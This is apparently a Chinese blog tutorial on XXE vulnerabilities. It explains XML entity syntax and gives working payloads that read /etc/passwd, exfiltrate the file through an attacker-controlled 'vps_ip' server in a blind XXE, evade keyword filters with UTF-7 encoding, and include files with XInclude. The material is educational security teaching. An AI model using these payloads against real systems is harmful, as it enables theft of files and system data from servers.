利用XXE漏洞读取文件

利用XXE漏洞读取文件

参考文献两篇:
https://www.anquanke.com/post/id/155328
https://www.anquanke.com/post/id/156227

XEE语法:

XML声明

<?xml version="1.0" encoding="UTF-8"?>

encodeing是指使用的字符编码格式有UTF-8,GBK,gb2312等等,可用于bypass

XML实体

外部实体分SYSYTEM及PUBLIC两种:
SYSYTEM引用本地计算机,PUBLIC引用公共计算机,外部实体格式如下:

<!ENTITY 引用名 SYSTEM(PUBLIC) "URI地址">
DOCTYPE声明

在XML文档中,<!DOCTYPE[...]>声明跟在XML声明的后面。实体也必须在DOCTYPE声明中声明。
例如

<?xml version="1.0" unicode="UTF-8"?>
<!DOCTYPE[
     在此声明实体<!ENTITY 实体引用名 "引用内容">
]>

实体引用

引用方式分为一般实体引用和参数实体引用。

一般实体引用: &实体引用名;
参数实体引用: %实体引用名;

完整格式

<?xml version="1.0" encoding="GBK"?>
<!DOCTYPE root[
  <!ENTITY sky1 "引用字符1">
  <!ENTITY sky2 "引用字符2">
]>
<root>
  <title value="&sky1;"> &sky2; </title>
  <title2>
  <value><a>&sky2;</a></value>
  </title2>
</root>

XEE安全隐患:

在解析Xml时,如果攻击者可以控制xml格式的文本内容,就可以让编译语言/脚本语言接收到恶意构造的参数,若不加过滤,则会引起安全隐患。

libxml2是用于解析xml的库,在2.6版本之前,默认允许引用外部实体(开启LIBXML_NOENT),可能导致xxe任意文件读取和BlindXXE文件读取攻击。

XXE任意文件读取

当xml解析内容有输出时,可以使用该攻击方法。
测试exp:

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>

此处将本地计算机中file:///etc/passwd文件的内容取出,赋值给了实体f
然后实体f的值作为元素x中的字符串数据被php解析的时候取出,作为对象里的内容
然后再输出该对象的时候被打印出来。

XXE任意文件盲读取

当XXE解析无输出时,尝试Blind XXE攻击:
1.我们可以利用file协议去读取本地文件
2.我们可以利用http协议让实体被带出

测试exp分为两部分:
post.xml

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % remote SYSTEM "http://vps_ip/evil.xml">
%remote;
%all;
]>
<root>&send;</root>

evil.xml

<!ENTITY % all "<!ENTITY send SYSTEM 'http://vps_ip/1.php?file=%file;'>">

这样一来,在解析xml的时候:
1.file实体被赋予file:///etc/passwd的内容
2.解析remote值的时候,访问http://vps_ip/evil.xml
3.在解析evil.xml中all实体的时候,将file实体带入
4.访问指定url链接,将数据带出
于是成功造成了blind xxe文件读取

关键词过滤Bypass

例如,当ENTITY等被过滤,那么我们可以尝试使用utf-7等其他编码方式。
首先利用该网站

https://www.motobit.com/util/charset-codepage-conversion.asp

将payload

<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>

转为utf-7,并在声明中指定utf-7编码

<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE ANY +AFs-
    +ADwAIQ-ENTITY f SYSTEM +ACI-file:///etc/passwd+ACIAPg-
+AF0APg-
+ADw-x+AD4AJg-f+ADsAPA-/x+AD4-

XXE文件包含

当libxml2版本高于2.6时,默认无法引用外部实体。可尝试XXE文件包含攻击。

<?xml version="1.0" ?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="file:///etc/passwd" parse="text"/>
</root>

另外,xml用于数据存储时,将其当作是数据库,可能存在Xpath注入、Xpath盲注、代码注入等攻击方式。

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 正经的XXE梳理
    0×00 背景 近期看到OWASP TOP 10 2017 版中添加了XXE的内容便对XXE的一些知识进行梳理和总...
    查无此人asdasd阅读 1,084评论 0 2
  • XML注入,xxe,xpath
    XML基础 众所周知,xml常用于数据存储和传输,文件后缀为 .xml; 它是可扩展标记语言(Extensible...
    帅猪佩奇阅读 2,732评论 0 1
  • XXE学习
    title: XXE学习date: 2019-03-22 20:51:41tags:- XXEcategories...
    Miracle778阅读 3,118评论 0 5
  • xxe漏洞检测及代码执行过程
    2019-05-21 1前言 对于xxe漏洞可能是自己挖洞时间太短,真是没用遇到过啊!都是靶机或者ctf遇到的。写...
    _Holy_阅读 6,876评论 0 0
  • h5常见的面试题
    第一部分 HTML&CSS整理答案 1. 什么是HTML5? 答:HTML5是最新的HTML标准。 注意:讲述HT...
    kismetajun阅读 27,736评论 1 45